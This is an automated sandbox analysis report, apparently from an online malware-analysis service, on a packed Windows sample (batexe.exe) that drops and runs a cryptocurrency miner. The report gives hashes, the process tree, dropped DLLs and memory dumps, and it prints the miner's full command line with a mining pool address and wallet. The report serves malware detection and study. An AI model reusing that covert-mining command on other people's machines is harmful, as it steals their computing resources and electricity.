73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
300s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
18-02-2024 15:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
4200	b2e.exe
424	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
424	cpuminer-sse2.exe
424	cpuminer-sse2.exe
424	cpuminer-sse2.exe
424	cpuminer-sse2.exe
424	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2028-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2028 wrote to memory of 4200	2028	batexe.exe	75
PID 2028 wrote to memory of 4200	2028	batexe.exe	75
PID 2028 wrote to memory of 4200	2028	batexe.exe	75
PID 4200 wrote to memory of 1856	4200	b2e.exe	76
PID 4200 wrote to memory of 1856	4200	b2e.exe	76
PID 4200 wrote to memory of 1856	4200	b2e.exe	76
PID 1856 wrote to memory of 424	1856	cmd.exe	79
PID 1856 wrote to memory of 424	1856	cmd.exe	79

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2028
- C:\Users\Admin\AppData\Local\Temp\93D4.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\93D4.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\93D4.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\95D7.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1856
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:424

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\93D4.tmp\b2e.exe

Filesize
1.9MB

MD5
dbb640c394ccd1b3d597d22dafd580a1

SHA1
b556a6e533bca221ce88ba924c37bb25ef652495

SHA256
e6ef0a6475a9d388d6abf7ab32b6bcb79d8b5980c920cf79ff6444781f9de495

SHA512
59c9c62b8b598de07a8a3b77e4d9c9e88e1d2471629b72dc91a08bc03eec7b6981bf47e0323f0465640e7c9fe7a6f8ec88aabe270c002ac7207efc7474b0952c

Download Submit
C:\Users\Admin\AppData\Local\Temp\93D4.tmp\b2e.exe

Filesize
1.3MB

MD5
d15e918e283f0c127978dc08450e6f55

SHA1
bf9812d936c7ecd2278508aa3b16fd068d7cca59

SHA256
0d1e8500b8b509beecbdc2e5dfcae9d0d9ea4adc156419f36a906bdb96523c22

SHA512
175b431e4cace496c73951815847906842f11165ce0c972ea430a0f4e4aff2fc95a4201fe30f362d708e0f8abf519b5cf8959b335e3499527710ed7bc7317df0

Download Submit
C:\Users\Admin\AppData\Local\Temp\95D7.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
315KB

MD5
7a82fbe52b3532c879bd49bc480ae87c

SHA1
3bb1d1c614c6d0f6c2d4d69d5667dcd5588c6157

SHA256
5997b0b73790d65f007557f7c7ee779f822752298ea65b7ad5fe5613023138b8

SHA512
d2fe88cd77f76f1984f49a4d6e326f605f6f6066e6b35fd07278f966f3f51aca3543dbd697a875455aaee720cf5cad8783dbc685a1cfd7a5bed041871404145d

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
257KB

MD5
074c1bbd9091f1ef589a782371c215a2

SHA1
d027ef26c407f0acb597cbc3c8df65f6c9dc6a88

SHA256
fd9e8035355174e7f256735debbb383c82f2b13039e932d3ee041719c961bd87

SHA512
1310cb2294140143e328be647b82f6b7c7f93b0736b64c973f51d6439364c34934ff10beda96f443c85d3dd1e7fbf22020a52298b3ba1aa4bab06c20c8053d78

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
273KB

MD5
3e61a15ce376d6af64784fde30fea04e

SHA1
169e8c25f31da3b69e7b2136e0fc9278c8442905

SHA256
8b4c03715c4586b63c3fdc1d163d68f3a6b4c64b7dbc8efd37a133ed1bc79db5

SHA512
e7be0815f0358309433c2a3bc5ab0fc9f780e8cf5bb758e9ffedca937f1b46ca8ad689a209a55cf972f2e4bcb1c74ff08ebf3f1592c77374f841b525e6250f90

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
252KB

MD5
acdd60453f5bd9963023991eecef0858

SHA1
1706cbd32b5ae600ce5665098b532aee3e8b6284

SHA256
35c33c4690cc3366250a2a1e548d5019e7f6895c33b374ef66e6d73b72e60dbf

SHA512
ae3a28f82f68be7272a410fc236e93363dc24b34eba947cdbec587f20716ded35fcfa1f41a2b893df001a4353f6b979a7fe5b7a5ae3640a0fbc5e1e1afbb964b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
228KB

MD5
5a48112b9121472c94c1f97b699adc8c

SHA1
85b7b5146dd3fd7130e04a8f358ffd11139d962c

SHA256
bb985163e7d87029ee7996dadf5d0988fd6481072042b1baf7e8462c3db9c46c

SHA512
80b3d0b369b11d89a554c4cef5ef4632597d12d1f8862bb0cb2f57dec743bc4e226b1073b12bda3f133f59dcb70191f1b580912da0743179c85975b9c40a9a7d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
235KB

MD5
0d30f63f8d2a2c866587b4db003ee31b

SHA1
602f8e7f94a87f7badfa55af5db0acb37d8435c4

SHA256
52b44735189fb5b66a153732052fde3ae3683ff2b2bc44e13af404ecc15dab87

SHA512
082dae080b73c8704877354fdea11fb44a68c9df0dca279ebda945eb77dd2cfb72bb23564a725fcb761cf0a7361db0ce62b5ae3b8c5c40dd88445f8f0c565317

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
338KB

MD5
b8ee6c23db253fe5ff4bbdfe5657e13a

SHA1
2376ac115b45450c752148de8dfde67933c67bb5

SHA256
a204a3acc611521262b4018536d4a0032db105e75bdf1a005f3ecdba8a5ac246

SHA512
7e5a6f3c08ad188c290de9ced63d6a6345f82d23de3f996bbfee75ab09e91104a0378e893a0f16bf1fe69c96524b99d643976f0e753edfa1a43d22c9eff7d5da

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
280KB

MD5
8bd4dc809f07510d2b61d0893868c131

SHA1
558822e6b5638b9699d317dc695d0cceabd15e65

SHA256
61dc5df33fef3914dadf70d8c8d2d6d7b038e2b4b4aa5432fa91a7c46888f455

SHA512
409f0597dc0667fd21512dc96ce4c58b083e24b469ca358d7fe08dd7926d3ae888def8675abf1dc0af3010f35c3f52abb49dca2710cd2ecc52c0abeaae7c2397

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
164KB

MD5
7a462b2879a387e6ba3047778dec07e7

SHA1
9dc7f2d3360ba05e19291abee588d5a70271a914

SHA256
4d2c5a4f8229b4f275d45e2b0dbf1a80384595d64a36d8cf299ce513a3175134

SHA512
51bf009f01ffd98a587839ffe48905eefc7c684fd500c4ea6ab6903a7bb307e29ead770a4f46c315e2b07a31eed2cf42cfd2b83f2f9b80d5a0d4aa6bc2008170

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
228KB

MD5
2bcd0b0c6574a8a19e84c9a01f389586

SHA1
e1a85844f0716d3748abc7457cce88ebc509532e

SHA256
2132a53b87f7c6c4e2f96c901392e978a6c8d2fdf08f0d5985924f8d4fb8e43d

SHA512
965f8d665047e04d516f94a34d32a59f76f47bad14395463587d243720fc84b3df8df71e9fd46c7485d9dde675f6b8a9ec16cc39be003a18f615bd37744980d4

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
197KB

MD5
ea5cd40c35c7831d36ba8a6def3faad5

SHA1
d9a127053143e724927680b32de693efd3759424

SHA256
ae277510e3ac6ccfa66d255c98927825e1e97d653874f5583fb49f6a7e2ba1d3

SHA512
430c4b53f0afa0ae393b4355675bb6c0ecd106e5c30d93455f87dc2a6599af85caf37c59ee5da05c0357010db7e3961fa1607bf2d4375e5c313ca34feecadd2d

Download Submit
memory/424-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/424-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/424-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/424-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/424-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/424-43-0x000000005CFB0000-0x000000005D048000-memory.dmp

Filesize
608KB

Download
memory/424-44-0x0000000001140000-0x00000000029F5000-memory.dmp

Filesize
24.7MB

Download
memory/424-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/424-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/424-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/424-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/424-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/424-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/424-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2028-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4200-6-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4200-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download